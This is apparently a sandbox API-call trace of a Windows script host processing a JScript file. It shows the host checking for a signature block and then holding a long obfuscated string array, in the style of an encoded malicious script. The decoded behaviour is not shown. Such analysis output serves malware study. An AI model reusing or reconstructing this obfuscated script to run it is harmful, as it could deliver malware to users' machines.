	[0111.412] wcsncmp (_String1="DhsKiwrPDl8KxFAY=','woHDt2ZcPMOsG", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0111.412] wcsncmp (_String1="hsKiwrPDl8KxFAY=','woHDt2ZcPMOsGX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0111.412] wcsncmp (_String1="sKiwrPDl8KxFAY=','woHDt2ZcPMOsGXt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0111.412] wcsncmp (_String1="KiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0111.412] wcsncmp (_String1="iwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0111.412] wcsncmp (_String1="wrPDl8KxFAY=','woHDt2ZcPMOsGXtZQc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0111.412] wcsncmp (_String1="rPDl8KxFAY=','woHDt2ZcPMOsGXtZQcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0111.412] wcsncmp (_String1="PDl8KxFAY=','woHDt2ZcPMOsGXtZQcOI", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0111.412] wcsncmp (_String1="Dl8KxFAY=','woHDt2ZcPMOsGXtZQcOIw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0111.412] wcsncmp (_String1="l8KxFAY=','woHDt2ZcPMOsGXtZQcOIwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0111.412] wcsncmp (_String1="8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0111.412] wcsncmp (_String1="KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0111.412] wcsncmp (_String1="xFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0111.412] wcsncmp (_String1="FAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 57
	[0111.412] wcsncmp (_String1="AY=','woHDt2ZcPMOsGXtZQcOIwrnDj1l", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0111.413] wcsncmp (_String1="Y=','woHDt2ZcPMOsGXtZQcOIwrnDj1lV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 76
	[0111.413] wcsncmp (_String1="=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0111.413] wcsncmp (_String1="','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0111.413] wcsncmp (_String1=",'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0111.413] wcsncmp (_String1="'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOU", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0111.413] wcsncmp (_String1="woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOUR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0111.413] wcsncmp (_String1="oHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0111.413] wcsncmp (_String1="HDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHf", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0111.413] wcsncmp (_String1="Dt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0111.413] wcsncmp (_String1="t2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0111.413] wcsncmp (_String1="2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0111.413] wcsncmp (_String1="ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0111.413] wcsncmp (_String1="cPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0k", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0111.413] wcsncmp (_String1="PMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0111.413] wcsncmp (_String1="MOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0111.413] wcsncmp (_String1="OsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4t", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0111.413] wcsncmp (_String1="sGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0111.413] wcsncmp (_String1="GXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 58
	[0111.413] wcsncmp (_String1="XtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0111.413] wcsncmp (_String1="tZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4R", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0111.413] wcsncmp (_String1="ZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0111.413] wcsncmp (_String1="QcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0111.413] wcsncmp (_String1="cOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0111.413] wcsncmp (_String1="OIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0111.413] wcsncmp (_String1="IwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 60
	[0111.413] wcsncmp (_String1="wrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0111.413] wcsncmp (_String1="rnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0111.413] wcsncmp (_String1="nDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0111.413] wcsncmp (_String1="Dj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Om", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0111.413] wcsncmp (_String1="j1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0111.413] wcsncmp (_String1="1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0111.413] wcsncmp (_String1="lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5J", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0111.413] wcsncmp (_String1="VNsOURHfDgl0kw4tDw4RSw7HCn8Omw5Jp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0111.413] wcsncmp (_String1="NsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0111.413] wcsncmp (_String1="sOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0111.413] wcsncmp (_String1="OURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0111.413] wcsncmp (_String1="URHfDgl0kw4tDw4RSw7HCn8Omw5JpXDot", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 72
	[0111.413] wcsncmp (_String1="RHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0111.413] wcsncmp (_String1="HfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0111.414] wcsncmp (_String1="fDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0111.414] wcsncmp (_String1="Dgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0111.415] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
	[0111.415] CloseCodeAuthzLevel () returned 0x1
	[0111.415] FreeLibrary (hLibModule=0x7fefd710000) returned 1
	[0111.415] ??2@YAPEAX_K@Z () returned 0x55f3f0
	[0111.416] SysStringLen (param_1="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 0x4b68
	[0111.416] GetProcessHeap () returned 0x260000
	[0111.416] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x298430, Size=0x11238) returned 0x2cae20
	[0111.417] ??2@YAPEAX_K@Z () returned 0x55f480
	[0111.417] GetCurrentThreadId () returned 0x794
	[0111.417] realloc (_Block=0x0, _Size=0xc8) returned 0x55f4e0
	[0111.417] ??2@YAPEAX_K@Z () returned 0x55f5b0
	[0111.417] malloc (_Size=0x1008) returned 0x559f30
	[0111.417] ??2@YAPEAX_K@Z () returned 0x55f5f0
	[0111.418] malloc (_Size=0x108) returned 0x557d80
	[0111.418] malloc (_Size=0x208) returned 0x55f7a0
	[0111.418] malloc (_Size=0x200) returned 0x55f9b0
	[0111.418] malloc (_Size=0x408) returned 0x55fbc0
	[0111.418] malloc (_Size=0x2008) returned 0x55af40
	[0111.419] malloc (_Size=0x808) returned 0x55cf50
	[0111.419] malloc (_Size=0x1008) returned 0x55d760
	[0111.420] malloc (_Size=0x4008) returned 0x36dfd0
	[0111.420] malloc (_Size=0x2008) returned 0x371fe0
	[0111.423] malloc (_Size=0x4008) returned 0x373ff0
	[0111.425] malloc (_Size=0x108) returned 0x557e90
	[0111.425] realloc (_Block=0x0, _Size=0x64) returned 0x55e770
	[0111.425] realloc (_Block=0x0, _Size=0x64) returned 0x55e7e0
	[0111.430] ??2@YAPEAX_K@Z () returned 0x55eaf0
	[0111.430] free (_Block=0x38c050) 
	[0111.430] free (_Block=0x378000) 
	[0111.430] free (_Block=0x36dfd0) 
	[0111.430] free (_Block=0x55af40) 
	[0111.431] free (_Block=0x559f30) 
	[0111.431] ??3@YAXPEAX@Z () returned 0x46511f01
	[0111.431] free (_Block=0x39ca20) 
	[0111.431] free (_Block=0x398a10) 
	[0111.431] free (_Block=0x394070) 
	[0111.431] free (_Block=0x390060) 
	[0111.431] free (_Block=0x388040) 
	[0111.431] free (_Block=0x384030) 
	[0111.431] free (_Block=0x380020) 
	[0111.431] free (_Block=0x37c010) 
	[0111.431] free (_Block=0x373ff0) 
	[0111.431] free (_Block=0x371fe0) 
	[0111.432] free (_Block=0x55d760) 
	[0111.432] free (_Block=0x55cf50) 
	[0111.433] free (_Block=0x55fbc0) 
	[0111.433] free (_Block=0x55f7a0) 
	[0111.433] free (_Block=0x557d80) 
	[0111.433] ??2@YAPEAX_K@Z () returned 0x55f5b0
	[0111.433] ??2@YAPEAX_K@Z () returned 0x55f610
	[0111.433] malloc (_Size=0x10) returned 0x55f640
	[0111.434] free (_Block=0x55f4e0) 
	[0111.434] ??2@YAPEAX_K@Z () returned 0x55f4e0
	[0111.434] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14ecf8 | out: ppv=0x14ecf8*=0x27f420) returned 0x0
	[0112.534] ??2@YAPEAX_K@Z () returned 0x55f560
	[0112.534] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x7fefec0a1b0, pUnk=0x55f560, riid=0x7fee1476340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x55f598 | out: pdwCookie=0x55f598*=0x100) returned 0x0
	[0112.535] IUnknown:AddRef (This=0x27f420) returned 0x2
	[0112.535] IUnknown:Release (This=0x27f420) returned 0x1
	[0112.535] ??2@YAPEAX_K@Z () returned 0x3afe90
	[0112.535] ??2@YAPEAX_K@Z () returned 0x55f940
	[0112.535] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14ed48 | out: ppv=0x14ed48*=0x27f420) returned 0x0
	[0112.535] IUnknown:Release (This=0x27f420) returned 0x1
	[0112.535] ??2@YAPEAX_K@Z () returned 0x55fa00
	[0112.535] ISystemDebugEventFire:IsActive (This=0x2975b0) returned 0x1
	[0112.536] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14ece8 | out: ppv=0x14ece8*=0x27f420) returned 0x0
	[0112.536] IUnknown:Release (This=0x27f420) returned 0x1
	[0112.536] malloc (_Size=0x2e48) returned 0x559f30
	[0112.537] GetCurrentThreadId () returned 0x794
	[0112.537] ??2@YAPEAX_K@Z () returned 0x55fae0
	[0112.538] ??2@YAPEAX_K@Z () returned 0x55fbc0
	[0112.538] malloc (_Size=0x208) returned 0x55fca0
	[0112.539] ??2@YAPEAX_K@Z () returned 0x55d190
	[0112.539] ??2@YAPEAX_K@Z () returned 0x55db10
	[0112.539] ??2@YAPEAX_K@Z () returned 0x55feb0
	[0112.540] ??2@YAPEAX_K@Z () returned 0x55ff30
	[0112.540] ??2@YAPEAX_K@Z () returned 0x55e490
	[0112.540] malloc (_Size=0x20) returned 0x55e780
	[0112.540] malloc (_Size=0x288) returned 0x55e7b0
	[0112.540] realloc (_Block=0x0, _Size=0x140) returned 0x3b0810
	[0112.541] ??2@YAPEAX_K@Z () returned 0x3b0fb0
	[0112.542] ??2@YAPEAX_K@Z () returned 0x3b0a20
	[0112.542] ??2@YAPEAX_K@Z () returned 0x3b1090
	[0112.542] malloc (_Size=0x80) returned 0x3b1140
	[0112.543] malloc (_Size=0x108) returned 0x557d80
	[0112.543] ??2@YAPEAX_K@Z () returned 0x3b11d0
	[0112.543] malloc (_Size=0x18) returned 0x55ffb0
	[0112.545] ??2@YAPEAX_K@Z () returned 0x3b12b0
	[0112.545] ??2@YAPEAX_K@Z () returned 0x3b1f60
	[0112.545] malloc (_Size=0x80) returned 0x3b1360
	[0112.545] malloc (_Size=0x108) returned 0x557e90
	[0112.547] ??2@YAPEAX_K@Z () returned 0x3b1480
	[0112.550] ??2@YAPEAX_K@Z () returned 0x3b2250
	[0112.552] ??2@YAPEAX_K@Z () returned 0x3b2330
	[0112.552] ??2@YAPEAX_K@Z () returned 0x3b23b0
	[0112.552] malloc (_Size=0x80) returned 0x3b2460
	[0112.552] malloc (_Size=0x108) returned 0x5580b0
	[0112.553] ??2@YAPEAX_K@Z () returned 0x3b2700
	[0112.553] malloc (_Size=0x18) returned 0x3b1530
	[0112.553] ??2@YAPEAX_K@Z () returned 0x3b27e0
	[0112.553] ??2@YAPEAX_K@Z () returned 0x3b2860
	[0112.554] malloc (_Size=0x80) returned 0x3b2910
	[0112.554] malloc (_Size=0x108) returned 0x5581c0
	[0112.554] ??2@YAPEAX_K@Z () returned 0x3b29a0
	[0112.554] malloc (_Size=0x30) returned 0x55ea40
	[0112.556] ??2@YAPEAX_K@Z () returned 0x3b2a80
	[0112.556] realloc (_Block=0x0, _Size=0xa0) returned 0x3b2b40
	[0112.556] ??2@YAPEAX_K@Z () returned 0x55e780
	[0112.556] ??2@YAPEAX_K@Z () returned 0x3b2bf0
	[0112.557] realloc (_Block=0x0, _Size=0xc8) returned 0x3b2c20
	[0112.558] ??2@YAPEAX_K@Z () returned 0x3b2cf0
	[0112.558] malloc (_Size=0x1008) returned 0x3707f0
	[0112.558] ??2@YAPEAX_K@Z () returned 0x3b2d30
	[0112.559] ??2@YAPEAX_K@Z () returned 0x3b2bf0
	[0112.559] free (_Block=0x3707f0) 
	[0112.559] ??3@YAXPEAX@Z () returned 0x46511f01
	[0112.559] free (_Block=0x55ea80) 
	[0112.559] free (_Block=0x3b2d30) 
	[0112.559] free (_Block=0x371a10) 
	[0112.559] free (_Block=0x371800) 
	[0112.559] free (_Block=0x5582d0) 
	[0112.559] ??2@YAPEAX_K@Z () returned 0x3b2cf0
	[0112.559] ??2@YAPEAX_K@Z () returned 0x3b2d50
	[0112.560] ??2@YAPEAX_K@Z () returned 0x3b2c20
	[0112.560] ??2@YAPEAX_K@Z () returned 0x3b2e30
	[0112.560] malloc (_Size=0x18) returned 0x55ea80
	[0112.560] ??2@YAPEAX_K@Z () returned 0x3b2f10
	[0112.560] malloc (_Size=0x80) returned 0x3707f0
	[0112.560] malloc (_Size=0x108) returned 0x5582d0
	[0112.561] ??2@YAPEAX_K@Z () returned 0x370880
	[0112.561] malloc (_Size=0x80) returned 0x370930
	[0112.561] malloc (_Size=0x108) returned 0x5583e0
	[0112.562] ??2@YAPEAX_K@Z () returned 0x3b2ca0
	[0112.562] malloc (_Size=0x1008) returned 0x370a90
	[0112.562] ??2@YAPEAX_K@Z () returned 0x371aa0
	[0112.563] ??2@YAPEAX_K@Z () returned 0x371df0
	[0112.563] free (_Block=0x370a90) 
	[0112.563] ??3@YAXPEAX@Z () returned 0x46511f01
	[0112.563] free (_Block=0x371c50) 
	[0112.563] free (_Block=0x371aa0) 
	[0112.563] free (_Block=0x3722a0) 
	[0112.563] free (_Block=0x372090) 
	[0112.563] free (_Block=0x5584f0) 
	[0112.563] ??2@YAPEAX_K@Z () returned 0x370a90
	[0112.563] ??2@YAPEAX_K@Z () returned 0x370af0
	[0112.565] ??2@YAPEAX_K@Z () returned 0x370bd0
	[0112.565] malloc (_Size=0x30) returned 0x3b2ca0
	[0112.566] ??2@YAPEAX_K@Z () returned 0x370cb0
	[0112.566] malloc (_Size=0x18) returned 0x3709c0
	[0112.566] ??2@YAPEAX_K@Z () returned 0x3709e0
	[0112.566] malloc (_Size=0x80) returned 0x370d90
	[0112.566] malloc (_Size=0x108) returned 0x5584f0
	[0112.567] ??2@YAPEAX_K@Z () returned 0x370e20
	[0112.568] ??2@YAPEAX_K@Z () returned 0x370e90
	[0112.568] ??2@YAPEAX_K@Z () returned 0x370f10
	[0112.568] malloc (_Size=0x208) returned 0x370f90
	[0112.569] ??2@YAPEAX_K@Z () returned 0x3711a0
	[0112.570] ??2@YAPEAX_K@Z () returned 0x371220
	[0112.571] ??2@YAPEAX_K@Z () returned 0x3712e0
	[0112.571] ??2@YAPEAX_K@Z () returned 0x371420
	[0112.571] ??2@YAPEAX_K@Z () returned 0x371560
	[0112.571] ??2@YAPEAX_K@Z () returned 0x3715f0
	[0112.571] ??2@YAPEAX_K@Z () returned 0x371680
	[0112.571] malloc (_Size=0x80) returned 0x371730
	[0112.571] malloc (_Size=0x108) returned 0x558600
	[0112.572] ??2@YAPEAX_K@Z () returned 0x3717c0
	[0112.572] ??2@YAPEAX_K@Z () returned 0x371870
	[0112.572] malloc (_Size=0x80) returned 0x371920
	[0112.572] malloc (_Size=0x108) returned 0x558710
	[0112.574] realloc (_Block=0x0, _Size=0x64) returned 0x3719b0
